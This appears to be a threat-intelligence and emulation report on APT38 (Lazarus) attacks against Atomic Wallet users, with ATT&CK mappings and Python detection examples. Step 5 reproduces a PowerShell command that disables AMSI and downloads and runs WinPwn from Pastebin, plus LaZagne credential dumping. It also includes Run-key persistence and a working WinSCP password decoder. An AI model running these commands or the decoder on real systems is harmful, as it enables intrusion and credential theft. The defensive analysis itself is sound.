Analysis of the Attack Script: Attack Activities of APT38 (Lazarus Group) Targeting Users of Atomic Wallet

Overview

The Lazarus Group (whose financially motivated component Mandiant tracks as APT38) is an Advanced Persistent Threat (APT) group attributed to the North Korean government and active in both cyber espionage and financially motivated cybercrime. Since 2009 the group has carried out numerous major cyberattacks against industries and institutions worldwide, including governments, militaries, financial institutions, the nuclear and chemical industries, healthcare, aerospace, entertainment and media, and the cryptocurrency industry.

This attack scenario emulates the activity attributed to APT38 against users of the Atomic Wallet service platform: initial access is obtained through phishing emails and watering-hole compromises of legitimate websites, and sensitive data is then stolen. We analyse the group's tactics, techniques and procedures (TTPs) in detail to help security teams understand and defend against this class of threat.

Analysis of the Attack Chain

The attack chain of APT38 against Atomic Wallet users consists of seven main steps, covering the complete process from initial access to data exfiltration.

The following is a detailed analysis:

Step 1: Initial Access

The Lazarus Group mainly obtains initial access rights to the target system through the following three techniques:

  1. Phishing Email – Malicious Link (T1566.002):
    1. Use chains of open redirects to hide the final phishing destination.
    2. The phishing URLs pass through several redirects, including open redirects on Adobe and Twitter domains, before landing on a credential-harvesting page hosted in Microsoft Azure Blob Storage.
    3. Because every visible hop is a legitimate domain, URL-reputation checks on the initial link pass, and the true destination is revealed only by following the whole chain.
  2. Phishing Email – Malicious Attachment (T1566.001):
    1. Send an email carrying a malicious Word document that exploits CVE-2021-40444.
    2. This is a remote code execution vulnerability in MSHTML, the browser rendering engine that Office uses to render embedded web content; it affects Windows releases up to and including Windows Server 2022 and was exploited in the wild before a patch was available.
    3. The email is typically disguised as an official document, such as a small-claims court notice, to make the recipient more likely to open the attachment.
  3. Watering Hole Attack – SMOOTHRIDE (T1189):
    1. Attackers compromise legitimate websites and inject an iframe that leads to the download of the SMOOTHRIDE malware.
    2. SMOOTHRIDE is a Flash-based loader that embeds three different exploits.
    3. Depending on the Flash Player version found on the victim, it delivers one of CVE-2016-4119, CVE-2016-1019 or CVE-2015-8651.

Step 2: Command and Control

After successfully obtaining initial access rights, the attackers establish a command and control channel:

  1. Malicious File Transfer – Lazar Loader (T1105):
    1. This validation rule simulates the Lazar loader used to download the APT38.EXE file.
    2. The attackers exploit vulnerabilities in INISAFE CrossWeb EX and MagicLine4NX, third-party security software that is widely installed on Windows systems in South Korea.
    3. When a user whose Windows system has a vulnerable version of VestCert installed visits a website seeded with the malicious script, a code-execution flaw in a third-party library bundled with VestCert causes PowerShell to run, regardless of which web browser is used.
    4. PowerShell connects to the C2 server and downloads and executes malicious code.
    5. The Lazar loader then loads the Lazardoor backdoor onto the victim system.
  2. Command and Control – RATANKBAPOS Beacon (T1071.001):
    1. Simulate a host infected with a RATANKBAPOS variant beaconing to its command-and-control infrastructure.
    2. RATANKBAPOS is a backdoor that targets point-of-sale (payment card processing) systems; it captures Track 2 magnetic-stripe data and sends it to a remote C2 server.
    3. The malware can also run arbitrary commands and delete itself.
    4. It uses the distinctive User-Agent string "Nimo Software HTTP Retriever 1.0".
    5. Communication endpoints include the domains webkingston.com and energydonate.com.

Step 3: Intrusion Tool Transfer

At this stage, the attackers download additional malicious tools:

  1. Malicious File Transfer – BEAPY Credential Dumper (T1105):
    1. BEAPY is a worm that spreads over SMB (TCP/445) and MS SQL (TCP/1433), exploiting the MS17-010 SMB vulnerability.
    2. It uses the EternalBlue exploit against vulnerable hosts.
    3. After successful exploitation, it first runs a PowerShell script as a downloader to retrieve the main BEAPY payload.
  2. Malicious File Transfer – RATANKBAPOS Download (T1105):
    1. Download multiple variants of the RATANKBAPOS malware.
    2. These variants belong to the same point-of-sale backdoor family described in Step 2: they capture Track 2 payment card data and send it to a remote C2 server, execute arbitrary commands and delete themselves.

Step 4: Persistence

The attackers establish persistence in the system through the following methods:

  1. Protected Sandbox – HERMES.RADICAL Execution (T1204.002):
    1. HERMES.RADICAL is a variant of the HERMES ransomware that drops no ransom note.
    2. It is deployed as a distraction and to destroy evidence while posing as an ordinary ransomware attack.
    3. The actual command execution observed:
    4. Associated file hash value: b27881f59c8d8cc529fa80a58709db36
  2. Registry Run Key Persistence (T1547.001):
    1. HERMES.RADICAL maintains persistence by adding itself to the Run registry key. Example command:
REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Public\Documents\hermes.exe"
  • Associated file hash values: HERMES.RADICAL (b27881f59c8d8cc529fa80a58709db36) and RATANKBAPOS (944439b6693b0589ae73421c0a342d8a)
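
The REG ADD above is the whole persistence mechanism, so it is worth checking how a detection would pick it up. The following is an added example, not code from the report: it flags Run-key writes either from a process command line such as the one above or from a Sysmon Event ID 13 (RegistryEvent, value set) record. Field names follow Sysmon's schema; the benign installer event is constructed, and the three scoring reasons (user-writable target path, value name that typosquats a Windows binary, autorun written by a scripting tool rather than an installer) are this example's own assumptions.

```python
"""Added example (not code from the report): flag Run-key persistence of the
kind set by the REG ADD above, from a process command line or from a Sysmon
Event ID 13 (RegistryEvent, value set) record. Field names follow Sysmon's
schema; the benign event is constructed and the three reasons are assumptions."""
import re

RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)

# Paths an unprivileged user can write to; an autorun pointing here deserves a look.
USER_WRITABLE_RE = re.compile(
    r'^"?[A-Za-z]:\\(Users\\[^\\]+\\|ProgramData\\|Windows\\Temp\\)', re.IGNORECASE)

# Processes that set autoruns from a script rather than from an installer.
SCRIPTING_IMAGES = {"reg.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                    "wscript.exe", "cscript.exe", "mshta.exe"}

# Well-known Windows binaries whose names malware imitates (e.g. "svchos").
SYSTEM_BINARIES = ["svchost", "csrss", "lsass", "explorer", "winlogon",
                   "wininit", "services", "spoolsv", "taskhostw"]

REG_ADD_RE = re.compile(
    r'\breg(?:\.exe)?\s+add\s+"?(?P<key>[^"\s]+)"?\s+/v\s+"?(?P<name>[^"\s]+)"?'
    r'\s+/t\s+(?P<type>\w+)\s+/d\s+"?(?P<data>[^"]+)"?', re.IGNORECASE)


def _edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot one-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(value_name: str):
    """Return the system binary a value name imitates, or None."""
    name = value_name.lower().removesuffix(".exe")
    for real in SYSTEM_BINARIES:
        if name != real and _edit_distance(name, real) <= 1:
            return real
    return None


def reg_add_to_event(cmdline: str):
    """Turn a 'reg add' command line into the same shape as a Sysmon 13 record."""
    m = REG_ADD_RE.search(cmdline)
    if not m:
        return None
    return {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
            "TargetObject": m["key"] + "\\" + m["name"], "Details": m["data"]}


def assess_run_value(event: dict) -> list:
    """Return the reasons a Run/RunOnce value write looks like malicious persistence."""
    reasons = []
    target = event.get("TargetObject", "")
    if not RUN_KEY_RE.search(target):
        return reasons                      # not an autorun key at all
    value_name = target.rsplit("\\", 1)[-1]
    data = event.get("Details", "")
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if USER_WRITABLE_RE.match(data):
        reasons.append("autorun target in a user-writable path: " + data)
    real = lookalike_of(value_name)
    if real:
        reasons.append(f"value name {value_name!r} imitates {real}")
    if image in SCRIPTING_IMAGES:
        reasons.append(f"autorun written by {image} rather than an installer")
    return reasons


# The command from the report (Step 4) and a constructed benign installer event.
HERMES_REG_ADD = (r'REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" '
                  r'/v "svchos" /t REG_SZ /d "C:\Users\Public\Documents\hermes.exe"')
BENIGN_EVENT = {
    "EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
    "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
    "Details": r'"C:\Program Files\Vendor\agent.exe" /background',
}

if __name__ == "__main__":
    for reason in assess_run_value(reg_add_to_event(HERMES_REG_ADD)):
        print("HERMES:", reason)
    print("benign:", assess_run_value(BENIGN_EVENT))
```

Running the HERMES command through the check yields all three reasons, while the installer event yields none. The typosquat check is deliberately loose (edit distance one against a short list) because value names such as "svchos" are chosen to survive a quick glance in Autoruns; tune the list and the user-writable paths to the environment before alerting on a single reason.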

Step 5: Credential Access

The attackers attempt to obtain various credentials. The following are the actual command executions observed:

  1. Operating System Credential Dump (T1003):
    1. Use obfuscated LaZagne and WinPwn tools to dump credentials. The actual command is as follows:
powershell.exe -c $ep=Get-ExecutionPolicy;If ($ep -ne 'Unrestricted') {Set-ExecutionPolicy Unrestricted -Scope Process -Force};$ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$ref.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);$ZQ4OhIGp4X = "c0JCuHK6";$XrCXKEDyAY = "tEa3g77g";$sP0 = "https://pastebin.com/raw/Lna2ggwB";$YdFn9 = "C:\Users\Public\Documents";$WinPwn = "iex (iwr $sP0 -UseBasicParsing);Invoke-WinPwn -Localrecon";iex $WinPwn
  • The command first sets the execution policy to Unrestricted for the current process, then uses reflection to set the private amsiInitFailed field of System.Management.Automation.AmsiUtils to true, which makes AMSI treat itself as uninitialised and stop scanning the session. The two random-looking variables are junk inserted by the obfuscator. It then downloads WinPwn from a Pastebin raw paste with iwr, runs it in memory with iex and invokes its local reconnaissance module.
  • LaZagne is an open-source tool that recovers passwords stored on the system.
  2. Insecure Credential Collection (T1552):
    1. Use the Ldapquery tool to collect domain credentials that administrators have written into the description attribute of Active Directory objects:
    2. The tool queries the LDAP directory for objects whose attributes contain the string "password".
    3. Related file hash: e4c17fd72325c22b546e61a6d46eff1c
  3. Obtain Credentials from Password Stores (T1555):
    1. Use the LaZagne tool to dump saved email credentials:

C:\Users\Public\Documents\lazagne.exe mailsdir & rd /s /q C:\Users\Public\Documents

  • The command runs LaZagne against stored mail-client credentials and then deletes the whole working directory, removing the tool and its output from disk once it has finished.
  • Related file hash: 68d3bf2c363144ec6874ab360fdda00a
  4. Steal Application Access Tokens (T1528):
    1. The actual command to extract credentials from the WinSCP application:
    2. The SharpDecryptPwd tool specifically targets the credentials that WinSCP saves for its sessions.
    3. It reads the host name, user name and obfuscated password of each saved session from the registry path HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions.
    4. WinSCP protects these passwords only with a simple reversible scheme: every byte is bitwise-NOTed and XORed with a fixed constant and stored as hexadecimal, with the host name and user name prepended as a key and random padding added. The tool parses the hex string byte by byte, reverses the transformation, strips the key and reconstructs the clear-text password.
    5. Tested against credential extraction from WinSCP version 6.3.5.
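
The point to take from the WinSCP item is that a saved session password is obfuscated, not encrypted, so any tool with read access to HKCU can recover it. The following added example (not code from the report or from SharpDecryptPwd) reproduces WinSCP's "simple" password scheme in Python so that a blue team can verify the claim on its own test data: the decoder is what an analyst needs; the encoder is included only so the example runs offline. Constant names follow WinSCP's source; the session values are constructed, and seeding the padding generator is an assumption made for reproducibility (WinSCP pads with fresh random bytes).

```python
"""Added example (not code from the report or from SharpDecryptPwd): WinSCP's
"simple" password obfuscation, which SharpDecryptPwd reverses. Constant names
follow WinSCP's source; the session below is constructed, and the encoder is
included only so the example runs offline (its padding generator is seeded,
an assumption for reproducibility; WinSCP uses fresh random bytes)."""
import random

PWALG_SIMPLE_FLAG = 0xFF      # marks the current layout: flag, internal, length, shift
PWALG_SIMPLE_MAGIC = 0xA3     # XOR constant applied to every byte
PWALG_SIMPLE_INTERNAL = 0x00
PWALG_SIMPLE_MAXLENGTH = 50   # output is padded to at least this many bytes


def _encrypt_char(ch: int) -> str:
    # Each byte is bitwise-NOTed, XORed with the magic, then written as two hex digits.
    value = ((~ch) ^ PWALG_SIMPLE_MAGIC) & 0xFF
    return f"{value:02X}"


def _decrypt_next_char(buf: bytearray) -> int:
    # Consume two hex digits and undo the XOR and NOT; an exhausted buffer yields 0.
    if len(buf) < 2:
        return 0
    value = int(buf[:2].decode("ascii"), 16)
    del buf[:2]
    return (~(value ^ PWALG_SIMPLE_MAGIC)) & 0xFF


def encrypt_password(password: str, hostname: str, username: str, rng=None) -> str:
    """Produce the hex string WinSCP stores as the session's Password value."""
    rng = rng or random.Random(0)
    data = (hostname + username + password).encode("utf-8")   # key is prepended
    shift = (rng.randrange(PWALG_SIMPLE_MAXLENGTH - len(data))
             if len(data) < PWALG_SIMPLE_MAXLENGTH else 0)
    out = [_encrypt_char(PWALG_SIMPLE_FLAG), _encrypt_char(PWALG_SIMPLE_INTERNAL),
           _encrypt_char(len(data)), _encrypt_char(shift)]
    out += [_encrypt_char(rng.randrange(256)) for _ in range(shift)]   # leading junk
    out += [_encrypt_char(b) for b in data]
    while len(out) < PWALG_SIMPLE_MAXLENGTH:                           # trailing junk
        out.append(_encrypt_char(rng.randrange(256)))
    return "".join(out)


def decrypt_password(encrypted_hex: str, hostname: str, username: str) -> str:
    """Recover the clear-text password; returns '' if host/user do not match the key."""
    buf = bytearray(encrypted_hex.strip().encode("ascii"))
    key = (hostname + username).encode("utf-8")
    flag = _decrypt_next_char(buf)
    if flag == PWALG_SIMPLE_FLAG:
        _decrypt_next_char(buf)                # PWALG_SIMPLE_INTERNAL, unused
        length = _decrypt_next_char(buf)
    else:
        length = flag                          # legacy layout: first byte is the length
    skip = _decrypt_next_char(buf)
    del buf[: skip * 2]                        # drop the leading junk bytes
    plain = bytes(_decrypt_next_char(buf) for _ in range(length))
    if flag == PWALG_SIMPLE_FLAG:
        if not plain.startswith(key):          # hostname+username must match
            return ""
        plain = plain[len(key):]
    return plain.decode("utf-8", errors="replace")


# Constructed session in the shape of the values found under
# HKCU\Software\Martin Prikryl\WinSCP 2\Sessions\<session name>
SAMPLE_SESSION = {
    "HostName": "sftp.example.test",
    "UserName": "deploy",
    "Password": encrypt_password("S3cret!pw", "sftp.example.test", "deploy"),
}


def recover_session_password(session: dict) -> str:
    return decrypt_password(session["Password"], session["HostName"], session["UserName"])


if __name__ == "__main__":
    print("stored :", SAMPLE_SESSION["Password"])
    print("recovered:", recover_session_password(SAMPLE_SESSION))
```

Two practical consequences follow from the scheme. Every stored value begins with the encoding of the flag and internal bytes, so a registry or file scan for Password values starting with "A35C" under the Sessions key locates affected sessions quickly; and because the host name and user name are part of the key, a decoder given the wrong session metadata returns nothing rather than garbage, which is why the tool reads all three values together. The defensive fix is WinSCP's own option to store passwords under a master password, or not to save them at all.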

Step 6: Lateral Movement

The attackers attempt to move laterally within the network:

  1. Pass the Ticket (T1550.003):
    1. Dump Kerberos tickets from the infected host with tools such as Mimikatz.
    2. Use a stolen ticket to authenticate to another host without knowing the account's password.
  2. Network Service Discovery (T1046):
    1. Use Nmap's NTLM-information scripts against services on domain-joined hosts.
    2. The NTLM authentication negotiation discloses the server's NetBIOS and DNS domain and host names, revealing the Active Directory environment without valid credentials.
  3. Account Discovery (T1087):
    1. Use Nmap to run the smb-enum-domains script.
    2. Enumerate the Active Directory domains and their password and lockout policies.
  4. Dictionary Scan (T1595.003):
    1. Use Nmap and the Nmap Scripting Engine (for example ftp-brute) to brute-force FTP servers with common username and password lists.
  5. Lateral Tool Transfer (T1570):
    1. Use PsExec to copy the ROBBINHOOD ransomware to another host and execute it.
    2. PsExec is a Windows Sysinternals tool that executes programs on remote systems by installing a temporary service (PSEXESVC) over SMB.
    3. Because PsExec is a signed, legitimate Microsoft administration tool, antivirus rarely blocks it; the PSEXESVC service installation and the named pipe it creates are nevertheless reliable detection points.

Step 7: Exfiltration

Finally, the attackers collect and steal sensitive data:

  1. Collect Data from the Local System (T1005):
    1. Use the findstr command to search the file system for files matching the strings password, wallet, crypt and key.
  2. Find Credentials in Files (T1552.001):
    1. Use PowerShell to identify sensitive data on the local drive.
    2. Search the C:\Users directory for sensitive strings such as "juicypassword".
  3. Archive the Collected Data (T1560):
    1. Name the archive so that it looks like a Windows Update package.
    2. The file name follows the Windows Update knowledge-base convention, matching KB<number>.zip, so that it draws no attention in file listings or transfer logs.
  4. Upload via PowerShell FTP (T1048.003):
    1. Use PowerShell to exfiltrate the archive over FTP.
    2. Connect to a remote FTP server and upload the stolen data; because FTP is unencrypted and separate from the C2 channel, this corresponds to Exfiltration Over Unencrypted Non-C2 Protocol.

Detection and Mitigation Recommendations

Based on the analysis of APT38’s attack techniques, we recommend that security teams give priority to the following detection and mitigation measures:

1.Intrusion Tool Transfer Detection (T1105)

APT38 relies heavily on downloading additional stages of malware, so endpoint and network controls should be used together to detect the transfer of these payloads.

Detection Example

Detect the use of native tools to download malicious payloads:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")

Note that this rule requires all three indicators at once. The WinPwn command shown in Step 5 calls iwr and iex but contains neither DownloadData nor a hidden-window switch, so it would not match; a production rule should treat the download cradle, the in-memory execution (iex/Invoke-Expression), the window-hiding switch and the AMSI tampering as separate indicators and alert when several coincide.
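
To make that concrete, the following added example (not the report's own detection content) scores command lines against a small indicator table covering the T1105 download cradles discussed here, the AMSI tampering and credential tools from Step 5, and the FTP upload and KB<number>.zip naming from Step 7, and compares the result with the narrow rule quoted above applied literally. The two observed command lines are taken from the report; the FTP line and the benign lines are constructed, and the indicator weights and threshold are this example's assumptions.

```python
"""Added example (not the report's own detection content): score process
command lines for the download-cradle, AMSI-tampering, credential-tool and
FTP-exfiltration indicators described in this report, and compare the result
with the narrow rule quoted above. Weights and threshold are assumptions; the
two observed command lines come from the report, the others are constructed."""
import re

# (label, pattern, weight); labels are this example's own names.
INDICATORS = [
    ("web_client", re.compile(r"\b(iwr|invoke-webrequest|invoke-restmethod|start-bitstransfer|certutil)\b"
                              r"|downloadstring|downloaddata|downloadfile|net\.webclient", re.I), 2),
    ("execute_fetched", re.compile(r"\b(iex|invoke-expression)\b", re.I), 2),
    ("amsi_tamper", re.compile(r"amsiutils|amsiinitfailed|amsiscanbuffer", re.I), 3),
    ("policy_bypass", re.compile(r"set-executionpolicy\s+(unrestricted|bypass)"
                                 r"|-(ep|executionpolicy)\s+(bypass|unrestricted)", re.I), 1),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
    ("paste_site", re.compile(r"pastebin\.com/raw|paste\.ee|hastebin", re.I), 2),
    ("credential_tool", re.compile(r"lazagne|mimikatz|winpwn|sharpdecryptpwd|ldapquery", re.I), 3),
    ("self_delete", re.compile(r"\brd\s+/s\s+/q\b|remove-item\b.*-recurse|\bdel\s+/[fq]\b", re.I), 1),
    ("ftp_upload", re.compile(r"ftp://|ftpwebrequest|uploadfile|\bftp(\.exe)?\s+-s\b", re.I), 2),
    ("kb_archive", re.compile(r"\bKB\d{4,}\.zip\b", re.I), 2),
    ("public_dir", re.compile(r"c:\\users\\public", re.I), 1),
]
THRESHOLD = 4


def score_command_line(cmdline: str):
    """Return (score, [matched labels]) for one command line."""
    hits = [(label, weight) for label, rx, weight in INDICATORS if rx.search(cmdline)]
    return sum(w for _, w in hits), [label for label, _ in hits]


def page_rule(cmdline: str) -> bool:
    """The rule quoted above, literally: (IWR OR Invoke-WebRequest) AND DownloadData AND Hidden."""
    c = cmdline.lower()
    return ("iwr" in c or "invoke-webrequest" in c) and "downloaddata" in c and "hidden" in c


def triage(cmdlines, threshold=THRESHOLD):
    """Return [(score, labels, cmdline)] for every line at or above the threshold."""
    out = []
    for line in cmdlines:
        score, labels = score_command_line(line)
        if score >= threshold:
            out.append((score, labels, line))
    return out


# Observed in the report (Step 5).
OBSERVED_WINPWN = r"""powershell.exe -c $ep=Get-ExecutionPolicy;If ($ep -ne 'Unrestricted') {Set-ExecutionPolicy Unrestricted -Scope Process -Force};$ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$ref.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);$ZQ4OhIGp4X = "c0JCuHK6";$XrCXKEDyAY = "tEa3g77g";$sP0 = "https://pastebin.com/raw/Lna2ggwB";$YdFn9 = "C:\Users\Public\Documents";$WinPwn = "iex (iwr $sP0 -UseBasicParsing);Invoke-WinPwn -Localrecon";iex $WinPwn"""
OBSERVED_LAZAGNE = r"C:\Users\Public\Documents\lazagne.exe mailsdir & rd /s /q C:\Users\Public\Documents"
# Constructed: the kind of PowerShell FTP upload described in Step 7.
CONSTRUCTED_FTP = (r"""powershell.exe -w hidden -c "$c=New-Object Net.WebClient;"""
                   r"""$c.UploadFile('ftp://203.0.113.10/KB1234567.zip','C:\Users\Public\KB1234567.zip')" """)
# Constructed benign administration.
BENIGN_SERVICE = r'powershell.exe -NoProfile -Command "Get-Service -Name Spooler | Select-Object Status"'
BENIGN_DIR = r"cmd.exe /c dir C:\Users\Public\Documents"

SAMPLES = [OBSERVED_WINPWN, OBSERVED_LAZAGNE, CONSTRUCTED_FTP, BENIGN_SERVICE, BENIGN_DIR]

if __name__ == "__main__":
    for score, labels, line in triage(SAMPLES):
        print(score, labels, line[:60])
    print("literal page rule on WinPwn command:", page_rule(OBSERVED_WINPWN))
```

The literal rule returns False for the WinPwn command, while the weighted scoring flags it on seven indicators, flags the LaZagne line on the tool name, the self-deletion and the C:\Users\Public working directory, and leaves both benign lines below the threshold. The weights are deliberately coarse: the value of the approach is that no single string is required, so an attacker who swaps iwr for a .NET WebClient call or moves from Pastebin to another paste site still accumulates a score.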

Mitigation Measures

  • Implement a Network Intrusion Prevention System (NIPS).
  • Conduct in-depth inspection of network traffic.
  • Limit unnecessary outbound connections.

2.Credential Access Protection

APT38 actively searches for and steals various types of credentials, especially cryptocurrency wallet credentials.

Detection Example

Monitor the following activities:

  • The use of the LaZagne tool.
  • Execution of PowerShell scripts for credential dumping.
  • Registry access to locations where known credentials are stored.

Mitigation Measures

  • Implement a strong password policy.
  • Use multi-factor authentication.
  • Limit privileged accounts.
  • Use a PAM (Privileged Access Management) solution.

3.Lateral Movement Protection

Prevent attackers from moving laterally within the network:

Detection Example

  • Monitor changes in the connection patterns of active sessions.
  • Detect suspicious service creation or remote execution.
  • Monitor specific techniques such as Pass the Ticket.

Mitigation Measures

  • Network segmentation.
  • Implement the principle of least privilege.
  • Use advanced endpoint protection solutions.

4.Command and Control Communication Detection

Identify communication with known C2 servers:

Detection Example

  • Monitor specific User-Agent strings: “Nimo Software HTTP Retriever 1.0”.
  • Detect suspicious HTTP request patterns.
  • Identify uncommon data transfer patterns.
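
The User-Agent and domain indicators from the RATANKBAPOS beacon in Step 2 are exact-match indicators, and the third bullet above (uncommon transfer patterns) is where the durable signal lies: a beacon keeps a nearly constant interval while a browser does not. The following added example (not code from the report) does both over web-proxy records: it matches the User-Agent and the two domains (including their subdomains), and it flags source/host pairs whose request intervals have low variance. The log format and every record are constructed; a real proxy has its own format, so only parse_proxy_log needs adapting, and the beacon thresholds are assumptions.

```python
"""Added example (not from the report): match web-proxy records against the
RATANKBAPOS C2 indicators above (User-Agent and domains) and flag fixed-interval
beaconing. The log format and all records are constructed; the min_count and
max_cv thresholds are assumptions to tune per environment."""
import re
import statistics
from datetime import datetime
from urllib.parse import urlsplit

C2_USER_AGENTS = {"Nimo Software HTTP Retriever 1.0"}
C2_DOMAINS = {"webkingston.com", "energydonate.com"}

# Constructed format: <timestamp> <client ip> <method> <url> <status> "<user agent>"
LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
                     r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$')


def normalize_host(host: str) -> str:
    return host.lower().rstrip(".")


def parse_proxy_log(text: str) -> list:
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                         # skip malformed lines rather than fail
        rec = m.groupdict()
        rec["time"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
        rec["host"] = normalize_host(urlsplit(rec["url"]).hostname or "")
        events.append(rec)
    return events


def matches_c2_domain(host: str) -> bool:
    """Exact match or any subdomain of an indicator; never a look-alike suffix."""
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def match_iocs(events: list) -> list:
    """Return [(event, reasons)] for records hitting a known indicator."""
    hits = []
    for ev in events:
        reasons = []
        if ev["ua"] in C2_USER_AGENTS:
            reasons.append("known C2 User-Agent")
        if matches_c2_domain(ev["host"]):
            reasons.append("known C2 domain " + ev["host"])
        if reasons:
            hits.append((ev, reasons))
    return hits


def find_beacons(events: list, min_count: int = 4, max_cv: float = 0.15) -> list:
    """Flag (src, host) pairs whose inter-request gaps are nearly constant."""
    by_pair = {}
    for ev in events:
        by_pair.setdefault((ev["src"], ev["host"]), []).append(ev["time"])
    beacons = []
    for (src, host), times in by_pair.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        # coefficient of variation: std/mean; a scripted beacon sits near zero
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_cv:
            beacons.append((src, host, len(times), round(mean, 1)))
    return beacons


# Constructed records: one infected host beaconing about once a minute, one user browsing.
SAMPLE_LOG = """
2024-05-02T10:00:00Z 10.0.0.5 GET http://webkingston.com/index.php 200 "Nimo Software HTTP Retriever 1.0"
2024-05-02T10:00:20Z 10.0.0.7 GET https://www.example.test/news 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-05-02T10:01:01Z 10.0.0.5 GET http://webkingston.com/index.php 200 "Nimo Software HTTP Retriever 1.0"
2024-05-02T10:01:45Z 10.0.0.7 GET https://www.example.test/sports 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-05-02T10:02:00Z 10.0.0.5 GET http://webkingston.com/index.php 200 "Nimo Software HTTP Retriever 1.0"
2024-05-02T10:03:02Z 10.0.0.5 GET http://webkingston.com/index.php 200 "Nimo Software HTTP Retriever 1.0"
2024-05-02T10:03:30Z 10.0.0.7 GET https://cdn.example.test/app.js 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-05-02T10:03:59Z 10.0.0.5 POST http://webkingston.com/index.php 200 "Nimo Software HTTP Retriever 1.0"
"""

if __name__ == "__main__":
    events = parse_proxy_log(SAMPLE_LOG)
    for ev, reasons in match_iocs(events):
        print(ev["ts"], ev["src"], ev["host"], reasons)
    print("beacons:", find_beacons(events))
```

On the sample, the five requests from 10.0.0.5 hit both indicators, and the same pair is also reported by the interval check with a mean gap of about 60 seconds, even though the individual gaps vary by a few seconds. The interval check is what keeps working after the operators rotate the domain or the User-Agent; in practice run it over a sliding window and suppress known pollers such as update agents and monitoring probes.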

Mitigation Measures

  • Implement DNS filtering.
  • Configure firewall rules.
  • Deploy an advanced threat protection system.

Conclusion

The attacks by APT38 (Lazarus Group) targeting users of the Atomic Wallet service platform demonstrate the group's advanced technical capabilities and diverse attack techniques. The group combines phishing, watering-hole attacks and malware delivery in targeted attacks on cryptocurrency users.

By deeply understanding the tactics, techniques, and procedures (TTPs) of such attacks, security teams can better identify possible indicators of intrusion and implement appropriate defensive measures. Continuous security awareness training, timely system patch updates, robust authentication mechanisms, and comprehensive monitoring strategies are the keys to defending against such advanced threats.

The Atlas Security Validation Platform can help organizations test the effectiveness of their security defenses, identify potential defense weaknesses, and improve the overall capability of the security defense system by simulating such attack scenarios. Through continuous testing and improvement, organizations can better cope with the attack challenges posed by advanced threat groups such as APT38.